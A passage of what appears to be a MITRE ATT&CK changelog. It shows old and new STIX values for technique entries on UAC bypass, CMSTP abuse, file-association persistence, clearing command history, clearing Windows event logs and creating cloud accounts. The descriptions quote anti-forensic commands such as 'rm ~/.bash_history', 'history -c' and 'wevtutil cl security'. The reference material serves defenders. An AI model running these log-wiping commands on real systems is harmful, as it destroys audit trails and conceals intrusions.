Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) |
| external_references[1]['source_name'] | TechNet How UAC Works | Davidson Windows |
| external_references[1]['description'] | Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016. | Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works | http://www.pretentiousname.com/misc/win7_uac_whitelist2.html |
| external_references[2]['source_name'] | TechNet Inside UAC | TechNet How UAC Works |
| external_references[2]['description'] | Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016. | Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016. |
| external_references[2]['url'] | https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx | https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works |
| external_references[3]['source_name'] | MSDN COM Elevation | SANS UAC Bypass |
| external_references[3]['description'] | Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016. | Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016. |
| external_references[3]['url'] | https://msdn.microsoft.com/en-us/library/ms679687.aspx | http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass |
| external_references[4]['source_name'] | Davidson Windows | MSDN COM Elevation |
| external_references[4]['description'] | Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014. | Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016. |
| external_references[4]['url'] | http://www.pretentiousname.com/misc/win7_uac_whitelist2.html | https://msdn.microsoft.com/en-us/library/ms679687.aspx |
| external_references[5]['source_name'] | Github UACMe | enigma0x3 Fileless UAC Bypass |
| external_references[5]['description'] | UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. | Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016. |
| external_references[5]['url'] | https://github.com/hfiref0x/UACME | https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ |
| external_references[6]['source_name'] | enigma0x3 Fileless UAC Bypass | enigma0x3 sdclt app paths |
| external_references[6]['description'] | Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016. | Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017. |
| external_references[6]['url'] | https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ | https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ |
| external_references[7]['source_name'] | Fortinet Fareit | enigma0x3 sdclt bypass |
| external_references[7]['description'] | Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. | Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017. |
| external_references[7]['url'] | https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware | https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ |
| external_references[8]['source_name'] | SANS UAC Bypass | TechNet Inside UAC |
| external_references[8]['description'] | Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016. | Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016. |
| external_references[8]['url'] | http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass | https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx |
| external_references[9]['source_name'] | enigma0x3 sdclt app paths | Fortinet Fareit |
| external_references[9]['description'] | Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017. | Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. |
| external_references[9]['url'] | https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ | https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware |
| external_references[10]['source_name'] | enigma0x3 sdclt bypass | Github UACMe |
| external_references[10]['description'] | Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017. | UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. |
| external_references[10]['url'] | https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ | https://github.com/hfiref0x/UACME |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Metadata |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Metadata |
| Old Description | New Description |
|---|---|
| Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) | Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:34:03.247000+00:00 | 2022-03-11 18:38:36.109000+00:00 |
| description | Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) | Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Connection Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Connection Creation |
| Old Description | New Description |
|---|---|
Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012) |
Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command. For example:
* HKEY_CLASSES_ROOT\txtfile\shell\open\command
* HKEY_CLASSES_ROOT\txtfile\shell\print\command
* HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016. | |
| external_references | CAPEC-556 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-556 | |
| external_references | Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-01-24 13:40:47.282000+00:00 | 2022-04-20 16:55:49.219000+00:00 |
| description | Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:
* HKEY_CLASSES_ROOT\txtfile\shell\open\command
* HKEY_CLASSES_ROOT\txtfile\shell\print\command
* HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012) |
Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command. For example:
* HKEY_CLASSES_ROOT\txtfile\shell\open\command
* HKEY_CLASSES_ROOT\txtfile\shell\print\command
* HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012) |
| external_references[1]['source_name'] | capec | Microsoft Change Default Programs |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/556.html | https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs |
| external_references[2]['source_name'] | Microsoft Change Default Programs | Microsoft File Handlers |
| external_references[2]['description'] | Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016. | Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014. |
| external_references[2]['url'] | https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs | http://msdn.microsoft.com/en-us/library/bb166549.aspx |
| external_references[3]['source_name'] | Microsoft File Handlers | Microsoft Assoc Oct 2017 |
| external_references[3]['description'] | Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014. | Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018. |
| external_references[3]['url'] | http://msdn.microsoft.com/en-us/library/bb166549.aspx | https://docs.microsoft.com/windows-server/administration/windows-commands/assoc |
| external_references[4]['source_name'] | Microsoft Assoc Oct 2017 | TrendMicro TROJ-FAKEAV OCT 2012 |
| external_references[4]['description'] | Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018. | Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018. |
| external_references[4]['url'] | https://docs.microsoft.com/windows-server/administration/windows-commands/assoc | https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd |
| external_references[5]['source_name'] | TrendMicro TROJ-FAKEAV OCT 2012 | capec |
| external_references[5]['url'] | https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd | https://capec.mitre.org/data/definitions/556.html |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends. The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History) Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-16 18:09:48.686000+00:00 | 2022-09-01 21:58:56.496000+00:00 |
| description | In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
| external_references[1]['source_name'] | Microsoft PowerShell Command History | Sophos PowerShell command audit |
| external_references[1]['description'] | Microsoft. (2020, May 13). About History. Retrieved September 4, 2020. | jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7 | https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit |
| external_references[2]['source_name'] | Sophos PowerShell command audit | Microsoft PowerShell Command History |
| external_references[2]['description'] | jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. | Microsoft. (2020, May 13). About History. Retrieved September 4, 2020. |
| external_references[2]['url'] | https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7 |
| external_references[3]['source_name'] | Sophos PowerShell Command History Forensics | US-CERT-TA18-106A |
| external_references[3]['description'] | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| external_references[3]['url'] | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Sophos PowerShell Command History Forensics', 'description': 'Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.', 'url': 'https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_data_sources | User Account: User Account Authentication | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_platforms | Network |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Description |
|---|
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
* wevtutil cl system
* wevtutil cl application
* wevtutil cl security
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 21:17:03.732000+00:00 | 2022-04-20 13:02:07.168000+00:00 |
| external_references[1]['source_name'] | Microsoft wevtutil Oct 2017 | Microsoft Clear-EventLog |
| external_references[1]['description'] | Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018. | Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018. |
| external_references[1]['url'] | https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil | https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog |
| external_references[3]['source_name'] | Microsoft Clear-EventLog | Microsoft wevtutil Oct 2017 |
| external_references[3]['description'] | Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018. | Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018. |
| external_references[3]['url'] | https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog | https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Deletion |
| Description |
|---|
| Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-16 12:47:00.192000+00:00 | 2022-04-07 13:09:30.819000+00:00 |
| external_references[2]['source_name'] | Microsoft Support O365 Add Another Admin, October 2019 | AWS Create IAM User |
| external_references[2]['description'] | Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. | AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020. |
| external_references[2]['url'] | https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html |
| external_references[3]['source_name'] | AWS Create IAM User | GCP Create Cloud Identity Users |
| external_references[3]['description'] | AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020. | Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020. |
| external_references[3]['url'] | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html | https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554 |
| external_references[4]['source_name'] | GCP Create Cloud Identity Users | Microsoft Azure AD Users |
| external_references[4]['description'] | Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020. | Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020. |
| external_references[4]['url'] | https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554 | https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory |
| external_references[5]['source_name'] | Microsoft Azure AD Users | Microsoft Support O365 Add Another Admin, October 2019 |
| external_references[5]['description'] | Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020. | Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory | https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | SaaS |
| Old Description | New Description |
|---|---|
